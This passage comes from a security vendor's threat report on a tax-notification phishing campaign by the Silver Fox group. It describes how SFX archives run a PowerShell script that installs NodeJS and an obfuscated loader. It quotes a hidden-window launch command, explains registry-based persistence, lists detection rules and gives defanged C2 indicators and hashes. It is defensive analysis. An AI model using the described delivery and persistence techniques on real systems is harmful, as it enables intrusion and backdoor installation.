hxxps://sudsmama.com/api/download/50e24b3a-8662-4d2f-9837-\r\n8cc62aa8f697\r\nStarting in November 2025, the attackers began using a JavaScript loader to deliver ABCDoor. This was\r\ndistributed via self-extracting (SFX) archives, which were further packaged inside ZIP archives:\r\nCBDT.zip (MD5: 6495c409b59deb72cfcb2b2da983b3bb) (Related material.exe)\r\nNovember Statement.zip (MD5: b500e0a8c87dffe6f20c6e067b51afbf) (BillReceipt.exe)\r\nDecember Statement.zip (MD5: 814032eec3bc31643f8faa4234d0e049) (statement.exe)\r\nDecember Statement.zip (MD5: 90257aa1e7c9118055c09d4a978d4bee) (statement verify\r\n.exe)\r\nStatement of Account.zip (MD5: f8371097121549feb21e3bcc2eeea522) (Review the\r\nfile.exe)\r\nThe ZIP archives were likely distributed through phishing emails. They contained one of two SFX files:\r\nBillReceipt.exe (MD5: 2b92e125184469a0c3740abcaa10350c) or Review the file.exe (MD5:\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 23 of 30\n\n043e457726f1bbb6046cb0c9869dbd7d), which differed only in their icons.\r\nIcons of the SFX archives\r\nWhen executed, the SFX archive ran the following script:\r\nSFX archive script\r\nThis script launched run_direct.ps1, a PowerShell script contained within the archive.\r\nThe run_direct.ps1 script\r\nThe run_direct.ps1 script checked for the presence of NodeJS in the standard directory on the victim’s computer\r\n(%USERPROFILE%\\.node\\node.exe). If it was not found, the script downloaded the official NodeJS version\r\n22.19.0, extracted it to that same folder, and deleted the archive. It then executed run.deobfuscated.obf.js – also\r\nlocated in the SFX archive – using the identified (or newly installed) NodeJS, passing two parameters to it: an\r\nencrypted configuration string and a XOR key for decryption:\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 24 of 30\n\nDecrypted configuration for the JS loader\r\nThe JS code being executed is heavily obfuscated (likely using obfuscate.io). Upon execution, it writes the\r\nchannel parameter value from the configuration to the registry at HKCU:\\Software\\CarEmu:InstallChannel as a\r\nREG_SZ type. It then downloads an archive from the link specified in the zipUrl parameter and saves it to\r\n%TEMP%\\appclient_YYYYMMDDHHMMSS.zip (or /tmp on Linux). The script extracts this archive to the\r\n%USERPROFILE%\\AppData\\Local\\appclient directory (%HOME%/AppData/Local/appclient on Linux) and\r\nlaunches it by running cmd /c start /min python/pythonw.exe -m appclient in background mode with a\r\nhidden window. After extraction, the script deletes the ZIP archive.\r\nAdditionally, the code calls a console logging function after nearly every action, describing the operations in\r\nChinese:\r\nLog fragments gathered from throughout the JS code\r\nVictims\r\nAs previously mentioned, Silver Fox RustSL loaders are configured to operate in specific countries: Russia, India,\r\nIndonesia, South Africa, and Cambodia. The most recent versions of RustSL have also added Japan to this list.\r\nAccording to our telemetry, users in all of these countries – with the exception of Cambodia – have encountered\r\nRustSL. We observed the highest number of attacks in India, Russia, and Indonesia.\r\nDistribution of RustSL loader attacks by country, as a percentage of the total number of detections (download)\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 25 of 30\n\nThe majority of loader samples we discovered were contained within archives with tax-related filenames.\r\nConsequently, we can attribute these attacks to a single campaign with a high degree of confidence. That Silver\r\nFox has been sending emails on behalf of the tax authorities in Japan has also been reported by our industry peers.\r\nConclusion\r\nIn the campaign described in this post, attackers exploited user trust in official tax authority communications by\r\ndisguising malicious files as documents on tax violations. This serves as another reminder of the critical need for\r\nvigilance and the thorough verification of all emails, even those purportedly from authoritative sources. We\r\nrecommend that organizations improve employee security awareness through regular training and educational\r\ncourses.\r\nDuring these attacks, we observed the use of both established Silver Fox tools, such as ValleyRAT, and new\r\nadditions – including a customized version of the RustSL loader and the previously undocumented ABCDoor\r\nbackdoor. The attackers are also expanding their geographic focus: Russian organizations became a primary target\r\nin this campaign, and Japan was added to the supported country list in the malware’s configuration. Theoretically,\r\nthe group could add other countries to this list in the future.\r\nThe Silver Fox group employs a multi-stage approach to payload delivery and utilizes a segmented infrastructure,\r\nusing different addresses and domains for various stages of the attack. These techniques are designed to minimize\r\nthe risk of detection and prevent the blocking of the entire attack chain. To identify such activity in a timely\r\nmanner, organizations should adopt a comprehensive approach to securing their infrastructure.\r\nDetection by Kaspersky solutions\r\nKaspersky security solutions successfully detect malicious activity associated with the attacks described in this\r\npost. Let’s look at several detection methods using Kaspersky Endpoint Detection and Response Expert.\r\nThe activity of the malware described in this article can be detected when the command interpreter, while\r\nexecuting commands from a suspicious process, initiates a covert request to external resources to download and\r\ninstall the Node.js interpreter. KEDR Expert detects this activity using the nodejs_dist_url_amsi rule.\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 26 of 30\n\nSilver Fox activity can also be detected by monitoring requests to external services to determine the host’s\r\nnetwork parameters. The attacker performs these actions to obtain the external IP address and analyze the\r\nenvironment. The KEDR Expert solution detects this activity using the\r\naccess_to_ip_detection_services_from_nonbrowsers rule.\r\nAfter running the command cmd /c start /min python/pythonw.exe -m appclient , the Silver Fox payload\r\nestablishes persistence on the system by modifying the value of the UserInitMprLogonScript parameter in the\r\nHKCU\\Environment registry key. This allows attackers to ensure that malicious scripts run when the user logs in.\r\nSuch registry manipulations can be detected. The KEDR Expert solution does this using the\r\npersistence_via_environment rule.\r\nIndicators of compromise\r\nNetwork indicators:\r\nABCDoor C2\r\n45.118.133[.]203:5000\r\nabc.fetish-friends[.]com\r\nabc.3mkorealtd[.]com\r\nabc.sudsmama[.]com\r\nabc.woopami[.]com\r\nabc.ilptour[.]com\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 27 of 30\n\nabc.petitechanson[.]com\r\nabc.doublemobile[.]com\r\nABCDoor loader C2s\r\nmcagov[.]cc\r\nroldco[.]com\r\nC2s for malicious remote control utilities\r\nvnc.kcii2[.]com\r\nDistribution servers for phishing PDFs, archives, and encrypted RustSL payloads\r\nabc.haijing88[.]com\r\nValleyRAT C2\r\n108.187.37[.]85\r\n108.187.42[.]63\r\n207.56.138[.]28\r\nIP addresses\r\n108.187.41[.]221\r\n154.82.81[.]192\r\n139.180.128[.]251\r\n192.229.115[.]229\r\n207.56.119[.]216\r\n192.163.167[.]14\r\n45.192.219[.]60\r\n192.238.205[.]47\r\n45.32.108[.]178\r\n57.133.212[.]106\r\n154.82.81[.]205\r\nHashes\r\nPhishing PDF files\r\n1AA72CD19E37570E14D898DFF3F2E380\r\n79CD56FC9ABF294B9BA8751E618EC642\r\n0B9B420E3EDD2ADE5EDC44F60CA745A2\r\n6611E902945E97A1B27F322A50566D48\r\n84E54C3602D8240ED905B07217C451CD\r\nSFX archives containing ABCDoor JavaScript loader\r\n2B92E125184469A0C3740ABCAA10350C\r\n043E457726F1BBB6046CB0C9869DBD7D\r\nZIP archives containing malicious SFX archives\r\n6495C409B59DEB72CFCB2B2DA983B3BB\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 28 of 30\n\nB500E0A8C87DFFE6F20C6E067B51AFBF\r\n90257AA1E7C9118055C09D4A978D4BEE\r\nF8371097121549FEB21E3BCC2EEEA522\r\n814032EEC3BC31643F8FAA4234D0E049\r\nrun.deobfuscated.obf.js\r\nB53E3CC11947E5645DFBB19934B69833\r\nrun_direct.ps1\r\n0C3B60FFC4EA9CCCE744BFA03B1A3556\r\nSilver Fox RustSL loaders\r\n039E93B98EF5E329F8666A424237AE73\r\nB6DF7C59756AB655CA752B8A1B20CFFA\r\n5390E8BF7131CAAAA98A5DD63E27B2BC\r\n44299A368000AE1EE9E9E584377B8757\r\nE5E8EF65B4D265BD5FB77FE165131C2F\r\n3279307508F3E5FB3A2420DEC645F583\r\n1020497BEF56F4181AEFB7A0A9873FB4\r\nB23D302B7F23453C98C11CA7B2E4616E\r\nA234850DFDFD7EE128F648F9750DD2C4\r\n4FC5EC1DE89CE3FCDD3E70DB4A9C39D1\r\nA0D1223CA4327AA5F7674BDA8779323F\r\n70AE9CA2A285DA9005A8ACB32DD31ACE\r\nDD0114FFACC6610B5A4A1CB0E79624CC\r\n891DE2FF486A1824F2DB01C1BDF1D2E9\r\nB0E06925DB5416DFC90BABF46402CD6F\r\nAD39A5790B79178D02AC739099B8E1F4\r\nD1D78CD1436991ADB9C005CC7C6B5B98\r\n2C5A1DD4CB53287FE0ED14E0B7B7B1B7\r\nE6362A81991323E198A463A8CE255533\r\nCB3D86E3EC2736EE1C883706FCA172F8\r\nA083C546DC66B0F2A5E0E2E68032F62C\r\n70016DDBCB8543BDB06E0F8C509EE980\r\n8FC911CA37F9F451A213B967F016F1F8\r\n202A5BCB87C34993318CFA3FA0C7ECB0\r\n06130DC648621E93ACB9EFB9FABB9651\r\nF7037CC9A5659D5A1F68E88582242375\r\n8AC5BEE89436B29F9817E434507FEF55\r\n5ED84B2099E220D645934E1FD552AE3A\r\n27A3C439308F5C4956D77E23E1AAD1A9\r\n53B68CA8D7A54C15700CF9500AE4A4E2\r\n1D1F71936DB05F67765F442FEB95F3FD\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 29 of 30\n\n3C6AEC25EBB2D51E1F16C2EEF181C82A\r\n7F27818E4244310A645984CCC41EA818\r\nA75713F0310E74FFD24D91E5731C4D31\r\n4FC8C78516A8C2130286429686E200ED\r\n3417B9CF7ACB22FAE9E24603D4DE1194\r\n933F1CB8ED2CED5D0DD2877C5EA374E8\r\nB5CA812843570DCF8E7F35CACAB36D4A\r\nValleyRAT plugins installing ABCDoor\r\n4A5195A38A458CDD2C1B5AB13AF3B393\r\nE66BAE6E8621DB2A835FA6721C3E5BBE\r\nABCDoor stagers and loaders\r\n04194F8DDD0518FD8005F0E87AE96335\r\nF15A67899CFE4DECFF76D4CD1677C254\r\n11705121F64FA36F1E9D7E59867B0724\r\nMalicious VNC installers used in August 2025 attacks\r\n4D343515F4C87B9A2FFD2F46665D2D57\r\nDFC64DD9D8F776CA5440C35FEF5D406E\r\nEEFC28E9F2C0C0592AF186BE8E3570D2\r\n6CF382D3A0EAE57B8BAAA263E4ED8D00\r\n32407207E9E9A0948D167DCA96C41D1A\r\nD17CAF6F5D6BA3393A3A865D1C43C3D2\r\nABCDoor .pyd files\r\n13669B8F2BD0AF53A3FE9AC0490499E5\r\n5B998A5BC5AD1C550564294034D4A62C\r\nC50C980D3F4B7ED970F083B0D37A6A6A\r\nDE8F0008B15F2404F721F76FAC34456A\r\n9BF9F635019494C4B70FB0A7C0FB53E4\r\nA543B96B0938DE798DD4F683DD92A94A\r\nFA08B243F12E31940B8B4B82D3498804\r\nSource: https://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 30 of 30",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/silver-fox-tax-notification-campaign/119575/"
	],
	"report_names": [
		"119575"
	],
	"threat_actors": [],
	"ts_created_at": 1778121824,
	"ts_updated_at": 1778121850,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/40a740cc65981f960ecd5f2ee1450bf00b760d44.pdf",
		"text": "https://archive.orkl.eu/40a740cc65981f960ecd5f2ee1450bf00b760d44.txt",
		"img": "https://archive.orkl.eu/40a740cc65981f960ecd5f2ee1450bf00b760d44.jpg"
	}
}